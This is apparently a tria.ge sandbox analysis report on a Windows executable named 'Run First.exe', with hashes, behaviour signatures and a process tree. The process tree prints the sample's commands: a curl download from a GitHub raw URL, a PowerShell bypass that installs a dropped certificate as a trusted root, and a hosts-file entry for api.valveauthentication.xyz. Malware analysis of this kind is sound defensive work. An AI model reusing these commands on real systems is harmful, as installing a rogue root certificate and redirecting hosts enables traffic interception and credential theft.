Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

8

Static

static

5

Run First.exe

windows7-x64

8

Run First.exe

windows10-2004-x64

8

Analysis

  • max time kernel
    17s
  • max time network
    22s
  • platform
    windows7_x64
  • resource
    win7-20240221-de
  • resource tags

    arch:x64arch:x86image:win7-20240221-delocale:de-deos:windows7-x64systemwindows
  • submitted
    20/04/2024, 15:54

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Run First.exe

  • Size

    896KB

  • MD5

    3df354a50e13f7316e44b01739f99f2e

  • SHA1

    a1d1c697cadecbab3c043259acae1c162e767f96

  • SHA256

    5b05b1d4dc439d81003bc6fe8348716667070b69825222b2e0a9f91d66f86616

  • SHA512

    25242ca3eb37d73e40df0682cc6e948f3d01b9741969de081edb7086b25dc064937cb4364b00882da5e78166c94d544ce1c54792b919c561593c70b0da842708

  • SSDEEP

    12288:oqDEvFo+yo4DdbbMWu/jrQu4M9lBAlKhQcDGB3cuBNGE6iOrpfe4JdaDgaETy:oqDEvCTbMWu7rQYlBQcBiT6rprG8aky

Score
8/10

Malware Config

Signatures

  • Drops file in Drivers directory 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 12 IoCs
  • Suspicious use of SendNotifyMessage 12 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Run First.exe
    "C:\Users\Admin\AppData\Local\Temp\Run First.exe"
    1⤵
    • Drops file in System32 directory
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2156
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Windows\System32\k.bat
      2⤵
      • Drops file in Drivers directory
      • Suspicious use of WriteProcessMemory
      PID:2460
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c curl -s https://raw.githubusercontent.com/Suryajung8/aaaaaaaa/main/tori.xyzzz
        3⤵
          PID:2560
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo "
          3⤵
            PID:2136
          • C:\Windows\SysWOW64\findstr.exe
            findstr /R "^[0-9]*\.[0-9]*\.[0-9]*\.[0-9]*$"
            3⤵
              PID:1036
            • C:\Windows\SysWOW64\certutil.exe
              certutil -store TrustedRoot
              3⤵
                PID:2944
              • C:\Windows\SysWOW64\findstr.exe
                findstr /i /c:"C:\Windows\System32\server.crt"
                3⤵
                  PID:2284
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell.exe -ExecutionPolicy Bypass -Command "Import-Certificate -FilePath 'C:\Windows\System32\server.crt' -CertStoreLocation 'Cert:\LocalMachine\Root' -ErrorAction SilentlyContinue"
                  3⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1512
                • C:\Windows\SysWOW64\findstr.exe
                  findstr /C:" api.valveauthentication.xyz" "C:\Windows\System32\drivers\etc\hosts"
                  3⤵
                    PID:2940
                  • C:\Windows\SysWOW64\ipconfig.exe
                    ipconfig /flushdns
                    3⤵
                    • Gathers network information
                    PID:2540

              Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Windows\SysWOW64\k.bat
                Filesize

                1010B

                MD5

                cd4130fd318d21dcddbee0d7829cf258

                SHA1

                dc5a2f65c5b26f2cba1c3214760c00e05358ea51

                SHA256

                426a5f5e2d51f72dd1085102b437d0c1751da2f33374d2d8deff6e92e3e77a81

                SHA512

                7184a2e9d92dba35b50fa7f57b79af65e93453b11c50b098ecfb10f349d8484fb33b84b524ccb7ce64d66b4d7bd7a499877caabb7845025fe0d9d7a467e0616c

                Download Submit

              • C:\Windows\System32\drivers\etc\hosts
                Filesize

                5B

                MD5

                ec92700e9dd452ac45503ce6e98f11a3

                SHA1

                718b0059b629b63dc87bd3ef892f76f6e1371705

                SHA256

                688787fbb991b11b4e767d01c6da762e35a9aa8fdf3b2e74bf44d658f04c3067

                SHA512

                ed31b3af22a5b0718a3dc551d3cd9661972f1bd56af760d1edd977fb87b3c38195d1338bf86492560f6d157ea2d80a7b676927c557f26750846e2d85b1e55c7e

                Download Submit

              • memory/1512-8-0x00000000745B0000-0x0000000074B5B000-memory.dmp

                Filesize

                5.7MB

                Download

              • memory/1512-9-0x00000000745B0000-0x0000000074B5B000-memory.dmp

                Filesize

                5.7MB

                Download

              • memory/1512-10-0x0000000002530000-0x0000000002570000-memory.dmp

                Filesize

                256KB

                Download

              • memory/1512-11-0x0000000002530000-0x0000000002570000-memory.dmp

                Filesize

                256KB

                Download

              • memory/1512-12-0x0000000002530000-0x0000000002570000-memory.dmp

                Filesize

                256KB

                Download

              • memory/1512-13-0x00000000745B0000-0x0000000074B5B000-memory.dmp

                Filesize

                5.7MB

                Download